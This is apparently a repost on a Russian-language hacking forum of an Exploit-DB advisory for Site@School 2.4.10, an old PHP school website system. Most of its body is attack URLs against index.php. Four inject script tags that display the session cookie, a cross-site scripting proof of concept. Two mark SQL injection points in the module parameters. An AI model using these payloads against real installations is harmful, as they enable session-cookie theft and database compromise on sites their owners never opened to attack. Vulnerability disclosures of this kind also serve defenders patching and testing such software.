Exploit Site@School 2.4.10 - '/index.php' Cross-Site Scripting / SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36240
Проверка EDB
  1. Пройдено
Автор
STEFAN SCHURTZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2011-10-18
Код:
source: https://www.securityfocus.com/bid/50195/info

Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

XSS:

http://www.example.com/school/starnet/index.php?option=stats&suboption=&#039;"</style></script><script>alert(document.cookie)</script> 

http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site=&#039;"</style></script><script>alert(document.cookie)</script> 

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script> 

http://www.example.com/school/starnet/index.php?option=modulemanager&module=&#039;"</style></script><script>alert(document.cookie)</script>

SQL Injection:

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection]

http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection]
 
Источник
www.exploit-db.com

Похожие темы